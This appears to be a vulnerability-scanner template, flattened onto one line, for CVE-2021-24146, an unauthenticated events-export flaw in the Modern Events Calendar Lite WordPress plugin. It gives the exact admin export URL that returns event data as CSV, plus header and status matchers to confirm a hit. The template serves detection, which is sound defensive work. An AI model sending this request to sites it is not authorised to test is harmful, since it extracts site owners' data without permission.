id: CVE-2021-24146 info: name: Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export author: random_robbie severity: high description: Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example. reference: - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N cvss-score: 7.5 cve-id: CVE-2021-24146 cwe-id: CWE-284 tags: wordpress,wp-plugin,cve,cve2021 requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv" matchers-condition: and matchers: - type: word words: - "mec-events" - "text/csv" condition: and part: header - type: status status: - 200